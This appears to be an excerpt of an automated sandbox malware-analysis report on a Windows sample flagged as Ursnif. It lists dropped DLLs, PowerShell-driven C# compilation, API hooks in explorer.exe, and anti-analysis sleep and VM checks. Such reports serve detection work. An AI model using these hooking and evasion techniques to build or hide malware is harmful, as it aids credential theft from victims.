Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: EJ6FBXJ9Dg.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: EJ6FBXJ9Dg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: freebl3.pdb source: freebl3.dll.0.dr
Source: Binary string: softokn3.pdbp source: softokn3.dll.0.dr
Source: Binary string: mozglue.pdb@+ source: mozglue.dll.0.dr
Source: Binary string: nss3.pdb source: nss3.dll.0.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\jv54rgf4.pdb source: powershell.exe, 00000007.00000002.564670153.0000024AACF7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.0.dr
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: 1_2_0046B859 push 0000006Fh; retf 1_2_0046B85C
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: 1_2_004682EB push ecx; ret 1_2_004682FB
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: 1_2_00467F00 push ecx; ret 1_2_00467F09
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF100B LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00AF100B
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mkr2iq4u.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jv54rgf4.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mkr2iq4u.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jv54rgf4.cmdline Jump to behavior
PE file contains sections with non-standard names
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: sqlite3.dll.0.dr Static PE information: section name: /4
Source: sqlite3.dll.0.dr Static PE information: section name: /19
Source: sqlite3.dll.0.dr Static PE information: section name: /31
Source: sqlite3.dll.0.dr Static PE information: section name: /45
Source: sqlite3.dll.0.dr Static PE information: section name: /57
Source: sqlite3.dll.0.dr Static PE information: section name: /70
Source: sqlite3.dll.0.dr Static PE information: section name: /81
Source: sqlite3.dll.0.dr Static PE information: section name: /92
Drops PE files
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File created: C:\Users\user\AppData\LocalLow\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File created: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File created: C:\Users\user\AppData\LocalLow\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File created: C:\Users\user\AppData\LocalLow\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File created: C:\Users\user\AppData\Roaming\XHSRZM23.exe Jump to dropped file
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe File created: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\mkr2iq4u.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\jv54rgf4.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.511157759.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.637060024.0000024AC5DCC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463138382.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.508255245.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463345859.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463360995.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463226979.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463317653.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463266718.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463179986.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.510097829.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463066679.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XHSRZM23.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5920, type: MEMORYSTR
Source: Yara match File source: 1.3.XHSRZM23.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.1455940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.XHSRZM23.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.1455940.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.14294a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.13aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.616496245.0000024ABD467000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.510026391.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.509943695.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.564056482.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.635823652.0000024AC56F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FF8980C521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FF8980C5200
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF100B LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00AF100B
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking system information)
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2104 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9710 Jump to behavior
Found evasive API chain checking for process token information
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mkr2iq4u.dll Jump to dropped file
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jv54rgf4.dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Registry key enumerated: More than 174 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AFBABB LocalAlloc,LocalFree,LocalAlloc,GetLogicalDriveStringsW,GetLogicalDriveStringsW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 0_2_00AFBABB
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe API call chain: ExitProcess graph end node
Source: mshta.exe, 00000006.00000002.530558139.0000022C51AE6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\[^
Source: XHSRZM23.exe, 00000001.00000002.563297746.000000000064A000.00000004.00000020.00020000.00000000.sdmp, XHSRZM23.exe, 00000001.00000002.563614634.00000000006A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AFA0FD LocalAlloc,LocalAlloc,LocalAlloc,lstrlen,lstrcpyn,lstrcpyn,lstrlen,lstrcpyn,lstrcpyn,lstrlen,lstrcpyn,lstrcpyn,GetSystemInfo,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree, 0_2_00AFA0FD
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF6BAA FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,lstrlenW, 0_2_00AF6BAA
